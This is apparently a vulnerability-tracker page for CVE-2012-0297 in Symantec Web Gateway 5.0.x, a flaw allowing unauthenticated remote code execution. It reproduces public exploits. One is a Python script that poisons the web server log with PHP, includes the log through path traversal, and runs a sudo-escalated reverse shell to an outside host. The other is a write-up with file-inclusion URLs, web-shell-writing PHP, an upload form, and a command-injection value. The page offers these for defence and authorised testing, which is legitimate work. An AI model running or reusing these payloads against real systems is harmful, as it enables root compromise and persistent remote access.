CVE-2012-0297

critical

Published 2012-05-21 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18932 webapps linux verified python · 1 KB

muts · 2012-05-26

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

python exploit Source: Exploit-DB

#!/usr/bin/python

# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
# muts at offensive-security dot com


import socket
import base64

payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(taint)
expl.close()

trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(trigger)
expl.close()

EDB-19406 webapps linux verified text · 2 KB

S2 Crew · 2012-06-27

symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities

text exploit Source: Exploit-DB

Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
        You can execute OS commands just include the error_log:
        /usr/local/apache2/logs/
        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log
        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log

        Make a connection to port 80:
        <?php
        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
        $cmd = "<?php system(\$_GET['cmd']); ?>";
        fputs($f,$cmd);
        fclose($f);
		print "Shell creation done<br>";
        ?>

Arbitary file download and delete:
        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
	d parameter: the complete filename 
        After the download process application removes the original file with root access! :)

        Command execution methods:
        1.Method
        Download and delete the /var/www/html/ciu/.htaccess file.
        After it you can access the ciu interface on web.
        There is an upload script: /ciu/uploadFile.php
	User can control the filename and the upload location:
        $_FILES['uploadFile'];
        $_POST['uploadLocation'];

        2.Method
        <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="uploadFile">
        <input type="text" name="action" value="upload">
        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
        <input type="hidden" name="configuration" value="test">
        <input type="submit" value="upload!">
        </form>
	
	The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication:

        http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)

        From the modified POST message:
        Content-Disposition: form-data; name="pingaddress"
        127.0.0.1`whoami>/tmp/1234.txt`

EDB-19065 webapps php verified

Metasploit · 2012-06-12

Symantec Web Gateway 5.0.2.8 - 'ipchange.php' Command Injection (Metasploit)

Source code queued for fetch — refresh in a moment.

EDB-18942 remote linux verified

Metasploit · 2012-05-28

Symantec Web Gateway 5.0.2.8 - Command Execution (Metasploit)

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_linux/http/symantec_web_gateway_exec rank 600

Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection

Source fetch failed: fetch_error — view the original via the link above.

exploit_linux/http/symantec_web_gateway_lfi rank 600

Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions
symantec	web_gateway	`5.0`
symantec	web_gateway	`5.0.1`
symantec	web_gateway	`5.0.2`

References

CWEs

CWE-264

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.